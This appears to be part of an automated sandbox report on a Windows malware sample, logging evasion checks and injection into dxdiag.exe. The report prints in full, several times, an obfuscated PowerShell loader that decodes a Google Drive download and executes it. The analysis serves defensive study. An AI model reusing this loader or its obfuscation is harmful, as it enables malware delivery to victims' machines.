                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\SysWOW64\dxdiag.exeAPI/Special instruction interceptor: Address: 474C1C7
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4677Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5135Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6679Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3015Jump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeWindow / User API: threadDelayed 4854Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1600Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2636Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exe TID: 1892Thread sleep count: 4854 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exe TID: 5248Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\dxdiag.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\dxdiag.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\dxdiag.exeThread sleep count: Count: 4854 delay: -5Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeThread delayed: delay time: 60000Jump to behavior
                Source: dxdiag.exe, 00000014.00000002.3335131309.0000000005FF7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.0000000006024000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000002.00000002.2226848933.000001F3C89A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0301D508 LdrInitializeThunk,LdrInitializeThunk,4_2_0301D508

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_7156.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 2A00000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 270FDE8Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:AntndJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#linnas kandidtwr overskyet ecdysial hjlandene providentialism selekteringer #>;$rystelses='makeress';<#plungy firdobling preferrers aftvingende encoders hardier forsvarschefernes #>;$hvsnings=$host.privatedata;if ($hvsnings) {$narrishkeit++;}function atomangreb($antipapistical246){$bondske=$fremmeligst+$antipapistical246.length-$narrishkeit;for( $halfheartednesses=5;$halfheartednesses -lt $bondske;$halfheartednesses+=6){$minkfarven+=$antipapistical246[$halfheartednesses];}$minkfarven;}function rme($stillehavsflaadernes){ . ($posthume) ($stillehavsflaadernes);}$gulvmaattens=atomangreb 'spinamb ugeosade zskyldid.rivltsarelpartea hexi/ uror5angin. prod0a.tin manom(skonnwmyoepibarsen migodunaudo sulfwsnv.es lati kons nbaan.tiniti kldni1regis0bolig.kirop0opsam; civi antyw pub ivir,lnwid.w6rance4 igna;alene a,tabxreemk6crabb4speci;handl irettral,miv budg:midda1colpe2n dbr1bombe. hosl0under)ambit subelgrenteeu eldcvalthkmeethohyper/in,ho2 dune0 etnk1 list0 medb0nark 1subef0alder1 onr wicksfvaginitwi.trb rguephanefsci,soenga,xvandl/gstel1 umsk2 feri1skaks.,inkl0 lge ';$librettoens=atomangreb ' alibu tea,s circesui trbegav- geopa storginhomeia.hingarrutdisge ';$broderierne=atomangreb 'dimplhantietdistitgastepb,nusskrake:ungdo/funkt/over.d b llr selviafd,ivr vieeafkri.drogsg reklobidraobe,vegin.mulmarkser,gnf.figetctuberofamldm tang/.asteubev.dcp eud?lammieworkuxudsk.pdunbaotilm rrehant p lm=unuandcaddiomaskiwkinemnvbnenldelsao snivaatolldtegni&alumrism gsdbendi= paal1 uriniindtjs recrl a acudrapezm.dermsilenfdataijlige 8su co9 dobbm knusoto fl5contofornam9ingenglingul tomhosko euzarisount,ul skdyyrefluvcanon7udtmtqadmetemos itunderw,avsprdividtfattirtransupalma ';$udviskning=atomangreb 'stose>nedfr ';$posthume=atomangreb 'bargiimarkoe skibx oso ';$cassina='kendetegner';$dentine='\smaalige.eks';rme (atomangreb 'rabat$noncog tap lnacroo enlsbe segapsychlstagn:antiso oodvbo ene alkarforbecpsa oogrundam rcet bire= dy,t$ .ispemedionvatikv orev:tr chapredapbarfop scled fraiamatert eskaavigil+bes,a$dem edb rmae andrnseawat oomsispi.nnproloeha de ');rme (atomangreb ' viva$pedotgdisselt rmkosairlb pretaflig.lclogg: klasuremain sregs uspet hoveu agidspa ei op,eereadodperp.nsaddueanke s,oextskommu=te,te$driveb urmart llgokarnedbioloevrlesrheterinons e,athiroleosninpute succ.illu.s phy p swi.lfusibiserpetekstr(a ous$anti,uunderdg udev,ndiui mprosunshak opmanorga itroopn j.ckgfarth)staal ');rme (atomangreb ',arak[ kortnpneumeso attskovb.skrmfsoverpegarnerenjoyvslowmibauxicu.eskebrndepundiso.ealiifladfn non ts,okimprvepasquifnportea gonogdemimeafspnrotten] rip :fagbl: mainsf emmekontrcbud rulektir knowi mldttto nfyshantpver er kammosymmet vo dofl.decstratostranlmodpa heter=mini brneb[drot n,erieeraah t.umle.forfrsfilosemyretcstjfruudlaargar libilbotspilly tartphock,repiclopapert s liotagkacfrsteo li,ilcoh,bt yanoy aurepbeclaetypec]prize:antnd
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#linnas kandidtwr overskyet ecdysial hjlandene providentialism selekteringer #>;$rystelses='makeress';<#plungy firdobling preferrers aftvingende encoders hardier forsvarschefernes #>;$hvsnings=$host.privatedata;if ($hvsnings) {$narrishkeit++;}function atomangreb($antipapistical246){$bondske=$fremmeligst+$antipapistical246.length-$narrishkeit;for( $halfheartednesses=5;$halfheartednesses -lt $bondske;$halfheartednesses+=6){$minkfarven+=$antipapistical246[$halfheartednesses];}$minkfarven;}function rme($stillehavsflaadernes){ . ($posthume) ($stillehavsflaadernes);}$gulvmaattens=atomangreb 'spinamb ugeosade zskyldid.rivltsarelpartea hexi/ uror5angin. prod0a.tin manom(skonnwmyoepibarsen migodunaudo sulfwsnv.es lati kons nbaan.tiniti kldni1regis0bolig.kirop0opsam; civi antyw pub ivir,lnwid.w6rance4 igna;alene a,tabxreemk6crabb4speci;handl irettral,miv budg:midda1colpe2n dbr1bombe. hosl0under)ambit subelgrenteeu eldcvalthkmeethohyper/in,ho2 dune0 etnk1 list0 medb0nark 1subef0alder1 onr wicksfvaginitwi.trb rguephanefsci,soenga,xvandl/gstel1 umsk2 feri1skaks.,inkl0 lge ';$librettoens=atomangreb ' alibu tea,s circesui trbegav- geopa storginhomeia.hingarrutdisge ';$broderierne=atomangreb 'dimplhantietdistitgastepb,nusskrake:ungdo/funkt/over.d b llr selviafd,ivr vieeafkri.drogsg reklobidraobe,vegin.mulmarkser,gnf.figetctuberofamldm tang/.asteubev.dcp eud?lammieworkuxudsk.pdunbaotilm rrehant p lm=unuandcaddiomaskiwkinemnvbnenldelsao snivaatolldtegni&alumrism gsdbendi= paal1 uriniindtjs recrl a acudrapezm.dermsilenfdataijlige 8su co9 dobbm knusoto fl5contofornam9ingenglingul tomhosko euzarisount,ul skdyyrefluvcanon7udtmtqadmetemos itunderw,avsprdividtfattirtransupalma ';$udviskning=atomangreb 'stose>nedfr ';$posthume=atomangreb 'bargiimarkoe skibx oso ';$cassina='kendetegner';$dentine='\smaalige.eks';rme (atomangreb 'rabat$noncog tap lnacroo enlsbe segapsychlstagn:antiso oodvbo ene alkarforbecpsa oogrundam rcet bire= dy,t$ .ispemedionvatikv orev:tr chapredapbarfop scled fraiamatert eskaavigil+bes,a$dem edb rmae andrnseawat oomsispi.nnproloeha de ');rme (atomangreb ' viva$pedotgdisselt rmkosairlb pretaflig.lclogg: klasuremain sregs uspet hoveu agidspa ei op,eereadodperp.nsaddueanke s,oextskommu=te,te$driveb urmart llgokarnedbioloevrlesrheterinons e,athiroleosninpute succ.illu.s phy p swi.lfusibiserpetekstr(a ous$anti,uunderdg udev,ndiui mprosunshak opmanorga itroopn j.ckgfarth)staal ');rme (atomangreb ',arak[ kortnpneumeso attskovb.skrmfsoverpegarnerenjoyvslowmibauxicu.eskebrndepundiso.ealiifladfn non ts,okimprvepasquifnportea gonogdemimeafspnrotten] rip :fagbl: mainsf emmekontrcbud rulektir knowi mldttto nfyshantpver er kammosymmet vo dofl.decstratostranlmodpa heter=mini brneb[drot n,erieeraah t.umle.forfrsfilosemyretcstjfruudlaargar libilbotspilly tartphock,repiclopapert s liotagkacfrsteo li,ilcoh,bt yanoy aurepbeclaetypec]prize:antnd
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#linnas kandidtwr overskyet ecdysial hjlandene providentialism selekteringer #>;$rystelses='makeress';<#plungy firdobling preferrers aftvingende encoders hardier forsvarschefernes #>;$hvsnings=$host.privatedata;if ($hvsnings) {$narrishkeit++;}function atomangreb($antipapistical246){$bondske=$fremmeligst+$antipapistical246.length-$narrishkeit;for( $halfheartednesses=5;$halfheartednesses -lt $bondske;$halfheartednesses+=6){$minkfarven+=$antipapistical246[$halfheartednesses];}$minkfarven;}function rme($stillehavsflaadernes){ . ($posthume) ($stillehavsflaadernes);}$gulvmaattens=atomangreb 'spinamb ugeosade zskyldid.rivltsarelpartea hexi/ uror5angin. prod0a.tin manom(skonnwmyoepibarsen migodunaudo sulfwsnv.es lati kons nbaan.tiniti kldni1regis0bolig.kirop0opsam; civi antyw pub ivir,lnwid.w6rance4 igna;alene a,tabxreemk6crabb4speci;handl irettral,miv budg:midda1colpe2n dbr1bombe. hosl0under)ambit subelgrenteeu eldcvalthkmeethohyper/in,ho2 dune0 etnk1 list0 medb0nark 1subef0alder1 onr wicksfvaginitwi.trb rguephanefsci,soenga,xvandl/gstel1 umsk2 feri1skaks.,inkl0 lge ';$librettoens=atomangreb ' alibu tea,s circesui trbegav- geopa storginhomeia.hingarrutdisge ';$broderierne=atomangreb 'dimplhantietdistitgastepb,nusskrake:ungdo/funkt/over.d b llr selviafd,ivr vieeafkri.drogsg reklobidraobe,vegin.mulmarkser,gnf.figetctuberofamldm tang/.asteubev.dcp eud?lammieworkuxudsk.pdunbaotilm rrehant p lm=unuandcaddiomaskiwkinemnvbnenldelsao snivaatolldtegni&alumrism gsdbendi= paal1 uriniindtjs recrl a acudrapezm.dermsilenfdataijlige 8su co9 dobbm knusoto fl5contofornam9ingenglingul tomhosko euzarisount,ul skdyyrefluvcanon7udtmtqadmetemos itunderw,avsprdividtfattirtransupalma ';$udviskning=atomangreb 'stose>nedfr ';$posthume=atomangreb 'bargiimarkoe skibx oso ';$cassina='kendetegner';$dentine='\smaalige.eks';rme (atomangreb 'rabat$noncog tap lnacroo enlsbe segapsychlstagn:antiso oodvbo ene alkarforbecpsa oogrundam rcet bire= dy,t$ .ispemedionvatikv orev:tr chapredapbarfop scled fraiamatert eskaavigil+bes,a$dem edb rmae andrnseawat oomsispi.nnproloeha de ');rme (atomangreb ' viva$pedotgdisselt rmkosairlb pretaflig.lclogg: klasuremain sregs uspet hoveu agidspa ei op,eereadodperp.nsaddueanke s,oextskommu=te,te$driveb urmart llgokarnedbioloevrlesrheterinons e,athiroleosninpute succ.illu.s phy p swi.lfusibiserpetekstr(a ous$anti,uunderdg udev,ndiui mprosunshak opmanorga itroopn j.ckgfarth)staal ');rme (atomangreb ',arak[ kortnpneumeso attskovb.skrmfsoverpegarnerenjoyvslowmibauxicu.eskebrndepundiso.ealiifladfn non ts,okimprvepasquifnportea gonogdemimeafspnrotten] rip :fagbl: mainsf emmekontrcbud rulektir knowi mldttto nfyshantpver er kammosymmet vo dofl.decstratostranlmodpa heter=mini brneb[drot n,erieeraah t.umle.forfrsfilosemyretcstjfruudlaargar libilbotspilly tartphock,repiclopapert s liotagkacfrsteo li,ilcoh,bt yanoy aurepbeclaetypec]prize:antndJump to behavior
